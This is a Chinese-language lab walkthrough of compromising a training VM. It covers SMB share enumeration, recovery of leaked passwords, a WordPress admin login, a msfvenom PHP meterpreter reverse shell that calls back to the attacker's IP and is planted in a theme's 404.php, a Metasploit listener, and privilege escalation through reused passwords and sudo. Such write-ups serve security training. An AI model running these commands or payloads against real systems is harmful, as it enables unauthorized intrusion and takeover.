攻擊機:192.168.32.152
靶機 :192.168.32.155
打開靶機
nmap一下
我們看到了開放了 ssh,smb,mysql這些端口,還有一個大端口
對smb服務我們可以
1.使用空口令,弱口令嘗試,查看敏感文件
-- smbclient -L IP
-- smbclient '\\IP\$share'
-- get敏感文件
2.遠程溢出漏洞分析
--searchsploit samba版本號
我們用smbclient -L 192.168.32.155 列出smb索所分享的所有目錄,用空口令剛好可以登錄
發現一個共享設備打印機,一個共享文件還有一個空連接web服務器
我們查看下這些文件
smbclient '\\192.168.32.155\print$'
smbclient '\\192.168.32.155\share$'
smbclient '\\192.168.32.155\IPC$'
發現目前只有share的文件可以利用
那么就get 下載下來吧
get deets.txt
get robots.txt
發現在deets.txt文件中有串密碼12345
在wordpress目錄中發現config配置文件信息,下載下來,發現服務器admin和password
那么我們就嘗試用該賬戶和密碼登錄mysql數據庫
不允許遠程連接。。那么我們想辦法登錄到遠程服務器,ssh也是開放的端口,試試ssh
ssh Admin@192.168.32.155 試下出現的兩個密碼都不對
試試searchsploit 探索性smb版本有沒有可利用的溢出漏洞
nmap -A -v -T4 192.168.32.155 查看端口對應版本號
searchsploit 。。。 沒有發現任何溢出漏洞
我們暫時放棄smb和ssh,用http的端口試試,dirb一下
有關admin打開試試
在這里我們輸入剛才的Admin和密碼我們就登進去了!
那么我們就制作一個webshell木馬上傳上去
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 生成一個反彈shell上傳php木馬
保存下來
再打開metasploit啟動監聽
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.32.152
exploit
再打開剛才的網頁,找到了一個上傳webshell的位置
點擊update file
success!
再打開路徑獲得反彈shell
http://靶場ip/wordpress/wp-content/thems/twentyfifteen/404.php
啟動,會話秒斷。。。
最后發現payload設置錯了,搞成wiondows了。。。再來一次
python -c "import pty;pty.spawn('/bin/bash')" 優化終端
然后 su root,輸密碼嘗試了剛才找出幾個不對,那么再去試試別的用戶
cat /etc/passwd 發現home下一個用戶togie
su togie 密碼為找到的12345 sudo su 提權,靶場權限拿下
最后根目錄下有flag文件